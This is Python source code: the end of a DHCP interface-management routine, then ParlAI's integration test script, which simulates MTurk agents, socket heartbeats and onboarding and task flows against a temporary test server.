self.logger.info("could not flush ip addr: %s, %s", if_name, ex)
self.logger.info("SGi DHCP: port [%s] ip removed", if_name)
def _restart_dhclient_if(self, if_name):
self._cleanup_if(if_name, False)
setup_dhclient = ["dhclient", if_name]
try:
subprocess.check_call(setup_dhclient)
except subprocess.CalledProcessError as ex:
self.logger.info("could not release dhcp lease: %s, %s",
setup_dhclient, ex)
self.logger.info("SGi DHCP: restart for %s done", if_name)
def _set_arp_ignore(self, if_name: str, val: str):
sysctl_setting = 'net.ipv4.conf.' + if_name + '.arp_ignore=' + val
subprocess.check_call(['sysctl', sysctl_setting])
|
integration_test.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""
Script for testing complete functionality of the MTurk conversation backend.
Simulates agents and interactions and tests the outcomes of interacting with
the server to ensure that the messages that are recieved are as intended.
It pretends to act in the way that core.html is supposed to follow, both
related to what is sent and recieved, what fields are checked, etc. A change
to the core.html file will not be caught by this script.
Doesn't actually interact with Amazon MTurk as they don't offer a robust
testing framework as of September 2017, so interactions with MTurk and updating
HIT status and things of the sort are not yet supported in this testing.
"""
from parlai.core.params import ParlaiParser
from parlai.mturk.core.test.integration_test.worlds import TestOnboardWorld, \
TestSoloWorld, TestDuoWorld
from parlai.mturk.core.mturk_manager import MTurkManager, WORLD_START_TIMEOUT
from parlai.mturk.core.server_utils import setup_server, delete_server
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_state import AssignState
from parlai.mturk.core.agents import MTURK_DISCONNECT_MESSAGE
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
from parlai.mturk.core.mturk_utils import create_hit_config
from socketIO_client_nexus import SocketIO
import time
import os
import uuid
import threading
TEST_TASK_DESCRIPTION = 'This is a test task description'
MTURK_AGENT_IDS = ['TEST_USER_1', 'TEST_USER_2']
PORT = 443
FAKE_HIT_ID = 'FAKE_HIT_ID_{}'
TASK_GROUP_ID = 'TEST_TASK_GROUP_{}'
AGENT_1_ID = 'TEST_AGENT_1'
AGENT_2_ID = 'TEST_AGENT_2'
ASSIGN_1_ID = 'FAKE_ASSIGNMENT_ID_1'
HIT_1_ID = 'FAKE_HIT_ID_1'
SOCKET_TEST = 'SOCKET_TEST'
SOLO_ONBOARDING_TEST = 'SOLO_ONBOARDING_TEST'
SOLO_NO_ONBOARDING_TEST = 'SOLO_NO_ONBOARDING_TEST'
SOLO_REFRESH_TEST = 'SOLO_REFRESH_TEST'
DUO_ONBOARDING_TEST = 'DUO_ONBOARDING_TEST'
DUO_NO_ONBOARDING_TEST = 'DUO_NO_ONBOARDING_TEST'
DUO_VALID_RECONNECT_TEST = 'DUO_VALID_RECONNECT_TEST'
DUO_ONE_DISCONNECT_TEST = 'DUO_ONE_DISCONNECT_TEST'
COUNT_COMPLETE_TEST = 'COUNT_COMPLETE_TEST'
EXPIRE_HIT_TEST = 'EXPIRE_HIT_TEST'
ALLOWED_CONVERSATION_TEST = 'ALLOWED_CONVERSATION_TEST'
UNIQUE_CONVERSATION_TEST = 'UNIQUE_CONVERSATION_TEST'
AMAZON_SNS_TEST = 'AMAZON_SNS_TEST'
FAKE_ASSIGNMENT_ID = 'FAKE_ASSIGNMENT_ID_{}_{}'
FAKE_WORKER_ID = 'FAKE_WORKER_ID_{}_{}'
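# Time (in seconds) to wait for the socket manager to notice a missing
# heartbeat and mark an agent as disconnected.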
DISCONNECT_WAIT_TIME = SocketManager.DEF_SOCKET_TIMEOUT + 1.5
completed_threads = {}
start_times = {}
def dummy(*args):
pass
class MockAgent(object):
"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, opt, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.socketIO = None
self.always_beat = False
self.ready = False
self.wants_to_send = False
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.socketIO.emit(event_name, packet.as_dict())
def build_and_send_packet(self, packet_type, data, callback):
if not callback:
def callback(*args):
pass
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.socketIO.emit(event_name, msg, callback)
def send_message(self, text, callback=dummy):
if not callback:
def callback(*args):
pass
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
self.build_and_send_packet(Packet.TYPE_MESSAGE, data, callback)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
self.build_and_send_packet(Packet.TYPE_ALIVE, data, None)
def setup_socket(self, server_url, message_handler):
"""Sets up a socket for an agent"""
def on_socket_open(*args):
self.send_alive()
def on_new_message(*args):
message_handler(args[0])
def on_disconnect(*args):
self.disconnected = True
self.socketIO = SocketIO(server_url, PORT)
# Register Handlers
self.socketIO.on(data_model.SOCKET_OPEN_STRING, on_socket_open)
self.socketIO.on(data_model.SOCKET_DISCONNECT_STRING, on_disconnect)
self.socketIO.on(data_model.SOCKET_NEW_PACKET_STRING, on_new_message)
# Start listening thread
self.listen_thread = threading.Thread(target=self.socketIO.wait)
self.listen_thread.daemon = True
self.listen_thread.start()
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id': self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.socketIO.emit(data_model.SOCKET_ROUTE_PACKET_STRING, hb)
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
                'Timed out waiting for server to acknowledge {} alive'.format(
self.worker_id
)
def handle_setup(opt):
"""Prepare the heroku server without creating real hits"""
create_hit_config(
task_description=TEST_TASK_DESCRIPTION,
unique_worker=False,
is_sandbox=True
)
    # Populate files to copy over to the server
task_files_to_copy = []
task_directory_path = os.path.join(
opt['parlai_home'],
'parlai',
'mturk',
'core',
'test',
'integration_test'
)
task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
for mturk_agent_id in MTURK_AGENT_IDS + ['onboarding']:
task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
    # Set up the server with a likely-unique app name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], 'integration_test')
server_task_name = \
''.join(e for e in task_name if e.isalnum() or e == '-')
server_url = \
setup_server(server_task_name, task_files_to_copy)
return server_task_name, server_url
def handle_shutdown(server_task_name):
delete_server(server_task_name)
def wait_for_state_time(seconds, mturk_manager):
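    # Sleep for roughly `seconds`, only counting time while the manager's
    # socket connection is alive.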
seconds_done = 0
while (seconds_done < seconds):
if mturk_manager.socket_manager.alive:
seconds_done += 0.1
time.sleep(0.1)
def run_solo_world(opt, mturk_manager, is_onboarded):
MTURK_SOLO_WORKER = 'MTURK_SOLO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
workers[0].id = MTURK_SOLO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
task = opt['task']
mturk_agent = workers[0]
world = TestSoloWorld(opt=opt, task=task, mturk_agent=mturk_agent)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except Exception:
raise
finally:
pass
def run_duo_world(opt, mturk_manager, is_onboarded):
MTURK_DUO_WORKER = 'MTURK_DUO_WORKER'
    # Runs the duo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for worker in workers:
worker.id = MTURK_DUO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
world = TestDuoWorld(opt=opt, agents=workers)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except Exception:
raise
finally:
pass
def make_packet_handler_cant_task(agent, on_ack, on_hb, on_msg):
"""A packet handler that is unable to switch into task worlds"""
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if agent.always_beat:
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
if not agent.always_beat:
pass
elif not packet.data['conversation_id'].startswith('t_'):
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
else:
agent.always_beat = False
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def make_packet_handler(agent, on_ack, on_hb, on_msg):
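    # Standard mock packet handler: acks every message, keeps heartbeating
    # while agent.always_beat is set, and follows conversation-change
    # commands into whatever conversation the server assigns.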
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def check_status(input_status, desired_status):
assert input_status == desired_status, 'Expected to be in {}, was found ' \
'in {}'.format(desired_status, input_status)
def check_new_agent_setup(agent, mturk_manager,
status=AssignState.STATUS_ONBOARDING):
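    # Verify that the manager created worker and assignment state for this
    # agent, moved it into the expected status, and opened a socket channel.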
mturk_agent = mturk_manager.mturk_workers[agent.worker_id]
assert mturk_agent is not None, \
'MTurk manager did not make a worker state on alive'
mturk_assign = mturk_agent.agents[agent.assignment_id]
assert mturk_assign is not None, \
'MTurk manager did not make an assignment state on alive'
assert mturk_assign.state.status == status, \
'MTurk manager did not move the agent into {}, stuck in {}'.format(
status, mturk_assign.state.status
)
connection_id = mturk_assign.get_connection_id()
assert mturk_manager.socket_manager.socket_is_open(connection_id), \
'The socket manager didn\'t open a socket for this agent'
def test_sns_service(opt, server_url):
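    # Creates an SNS topic pointed at the test server, fires three fake MTurk
    # notifications at it, and verifies that all three reach the world's
    # message handler.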
global completed_threads
print('{} Starting'.format(AMAZON_SNS_TEST))
task_name = AMAZON_SNS_TEST
task_group_id = AMAZON_SNS_TEST
messages = 0
def world_on_new_message(pkt):
nonlocal messages # noqa: E999 we don't support python2
messages += 1
socket_manager = SocketManager(
server_url,
PORT,
dummy,
world_on_new_message,
dummy,
task_group_id
)
# Wait for manager to spin up
last_time = time.time()
while not socket_manager.alive:
time.sleep(0.2)
assert time.time() - last_time < 10, \
            'Timed out waiting for socket_manager to spin up'
mturk_utils.setup_aws_credentials()
arn = mturk_utils.setup_sns_topic(task_name, server_url, task_group_id)
mturk_utils.send_test_notif(arn, 'AssignmentAbandoned')
mturk_utils.send_test_notif(arn, 'AssignmentReturned')
mturk_utils.send_test_notif(arn, 'AssignmentSubmitted')
last_time = time.time()
while messages != 3:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 30, \
            'Timed out waiting for Amazon message'
mturk_utils.delete_sns_topic(arn)
completed_threads[AMAZON_SNS_TEST] = True
def test_socket_manager(opt, server_url):
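    # Exercises the SocketManager directly: checks alive/message/heartbeat
    # handling, packet resends until acked, idempotent channel opens, agent
    # timeout detection, and cleanup once all channels are closed.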
global completed_threads
TEST_MESSAGE = 'This is a test'
task_group_id = TASK_GROUP_ID.format('TEST_SOCKET')
socket_manager = None
world_received_alive = False
world_received_message = False
agent_timed_out = False
def world_on_alive(pkt):
nonlocal world_received_alive
# Assert alive packets contain the right data
worker_id = pkt.data['worker_id']
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
hit_id = pkt.data['hit_id']
assert hit_id == HIT_1_ID, 'HIT id was {}'.format(hit_id)
assign_id = pkt.data['assignment_id']
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
conversation_id = pkt.data['conversation_id']
assert conversation_id is None, \
'Conversation id was {}'.format(conversation_id)
# Start a channel
socket_manager.open_channel(worker_id, assign_id)
# Note that alive was successful
world_received_alive = True
def world_on_new_message(pkt):
nonlocal world_received_message
text = pkt.data['text']
assert text == TEST_MESSAGE, 'Received text was {}'.format(text)
world_received_message = True
def world_on_socket_dead(worker_id, assign_id):
nonlocal agent_timed_out
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
agent_timed_out = True
return True
socket_manager = SocketManager(
server_url,
PORT,
world_on_alive,
world_on_new_message,
world_on_socket_dead,
task_group_id
)
agent_got_response_heartbeat = False
received_messages = 0
did_ack = False
agent = MockAgent(opt, HIT_1_ID, ASSIGN_1_ID, AGENT_1_ID, task_group_id)
connection_id = '{}_{}'.format(AGENT_1_ID, ASSIGN_1_ID)
def agent_on_message(pkt):
nonlocal agent_got_response_heartbeat
nonlocal received_messages
nonlocal agent
if pkt['type'] == Packet.TYPE_HEARTBEAT:
agent_got_response_heartbeat = True
elif pkt['type'] == Packet.TYPE_MESSAGE:
if received_messages != 0:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
received_messages += 1
elif pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
def manager_on_message_ack(pkt):
nonlocal did_ack
did_ack = True
agent.setup_socket(server_url, agent_on_message)
time.sleep(1)
# Wait for socket to open to begin testing
agent.wait_for_alive()
assert socket_manager.socket_is_open(connection_id), \
'Channel was not properly opened for connecting agent'
# send some content from the agent
time.sleep(1)
agent.send_heartbeat()
time.sleep(1)
agent.send_message(TEST_MESSAGE, None)
time.sleep(1)
# Send some content from the socket manager, don't ack the first
# time to ensure that resends work, and ensure the callback is
# eventually called
test_blocking_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
socket_manager.get_my_sender_id(),
AGENT_1_ID,
ASSIGN_1_ID,
'',
None,
True,
True,
manager_on_message_ack
)
# Send packet and wait for it to arrive the first time
socket_manager.queue_packet(test_blocking_packet)
# Wait for socket to open to begin testing
last_time = time.time()
while received_messages == 0:
time.sleep(0.5)
assert time.time() - last_time < 10, \
            'Timed out waiting for server to send message'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_SENT, \
'Packet sent but status never updated'
# wait for resend to occur
time.sleep(2.5)
assert did_ack, 'Socket_manager\'s message ack callback never fired'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_ACK, \
        'Packet received but status never updated'
# Ensure queues are properly set up and that reopening an open socket
# does nothing
assert len(socket_manager.queues) == 1, \
'More queues were opened than expected for the connecting agent'
socket_manager.open_channel(AGENT_1_ID, ASSIGN_1_ID)
assert len(socket_manager.queues) == 1, \
'Second open for the worker was not idempotent'
time.sleep(8.5)
# Ensure all states happened and that the agent eventually disconnected
assert world_received_alive, 'World never received alive message'
assert world_received_message, 'World never received test message'
assert agent_timed_out, 'Agent did not timeout'
assert agent_got_response_heartbeat, 'Agent never got response heartbeat'
# Close channels and move on
socket_manager.close_all_channels()
assert not socket_manager.socket_is_open(connection_id), \
'Channel was not closed with close_all_channels'
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
assert len(socket_manager.queues) == 0, \
'Queues were not cleared on close, {} found'.format(
len(socket_manager.queues)
)
assert len(socket_manager.threads) == 0, \
'Threads were not cleared on close, {} found'.format(
len(socket_manager.threads)
)
    # Test to make sure we can't send a packet to a closed channel
test_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
AGENT_1_ID,
socket_manager.get_my_sender_id(),
ASSIGN_1_ID,
''
)
socket_manager.queue_packet(test_packet)
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
completed_threads[SOCKET_TEST] = True
def test_solo_with_onboarding(opt, server_url):
"""Tests solo task with onboarding to completion, as well as disconnect in
onboarding to ensure the agent is marked disconnected.
"""
global completed_threads
print('{} Starting'.format(SOLO_ONBOARDING_TEST))
opt['task'] = SOLO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 2)
worker_id = FAKE_WORKER_ID.format(SOLO_ONBOARDING_TEST, 1)
connection_id_1 = '{}_{}'.format(worker_id, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id, assign_id_2)
last_command = None
message_num = 0
expected_messages = [
TestOnboardWorld.TEST_TEXT_1, TestOnboardWorld.TEST_TEXT_2,
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_fail = \
MockAgent(opt, hit_id, assign_id_1, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_fail, dummy, dummy, msg_callback)
test_agent_fail.setup_socket(server_url, message_handler)
test_agent_fail.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_fail, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_1]
assign_state = mturk_manager_assign.state
# Run through onboarding, then disconnect and reconnect
test_agent_fail.always_beat = True
test_agent_fail.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent_fail.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent_fail.send_message('Hello1', dummy)
test_agent_fail.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
# Refresh the agent
test_agent_fail.conversation_id = None
test_agent_fail.send_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_INACTIVE_HIT, \
'Agent disconnected in onboarding didn\'t get inactive hit'
assert assign_state.status == AssignState.STATUS_DISCONNECT, \
'Disconnected agent not marked as so in state'
assert mturk_manager_assign.disconnected is True, \
'Disconnected agent not marked as so in agent'
# Connect with a new agent and finish onboarding
last_command = None
message_num = 0
test_agent = MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_ONBOARDING)
test_agent.send_message('Hello2', dummy)
wait_for_state_time(4, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
last_time = time.time()
while message_num == 2:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 10, \
            'Timed out waiting for server to acknowledge alive'
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello3', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert mturk_manager_assign.is_in_task(), 'Manager\'s copy of agent is ' \
'not aware that they are in a task, even though the state is'
assert len(assign_state.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello4', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of ' \
'onboarding, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert message_num == 4, 'Not all messages were successfully processed'
completed_threads[SOLO_ONBOARDING_TEST] = True
def test_solo_no_onboarding(opt, server_url):
"""Ensures a solo agent with no onboarding moves directly to a task world
and is able to complete the task and be marked as completed
"""
global completed_threads
print('{} Starting'.format(SOLO_NO_ONBOARDING_TEST))
opt['task'] = SOLO_NO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_NO_ONBOARDING_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
wait_for_state_time(3, mturk_manager)
test_agent.always_beat = False
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[SOLO_NO_ONBOARDING_TEST] = True
def test_solo_refresh_in_middle(opt, server_url):
"""Tests refreshing in the middle of a solo task to make sure state is
properly restored
"""
global completed_threads
print('{} Starting'.format(SOLO_REFRESH_TEST))
opt['task'] = SOLO_REFRESH_TEST
hit_id = FAKE_HIT_ID.format(SOLO_REFRESH_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_REFRESH_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_REFRESH_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
# Simulate a refresh
test_agent.conversation_id = None
test_agent.send_alive()
last_time = time.time()
while (last_command.data['text'] != data_model.COMMAND_RESTORE_STATE):
# Wait for the restore state command
time.sleep(1)
assert time.time() - last_time < 10, \
            'Timed out waiting for COMMAND_RESTORE_STATE to arrive'
# Check that the restore state had what we expected
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it back to task world'
assert len(last_command.data['messages']) == 1, \
'State restored with more than the 1 message expected, got {}'.format(
len(last_command.data['messages'])
)
assert last_command.data['messages'][0]['text'] == expected_messages[0], \
'Message sent in restore state packet wasn\'t correct'
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
        'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
completed_threads[SOLO_REFRESH_TEST] = True
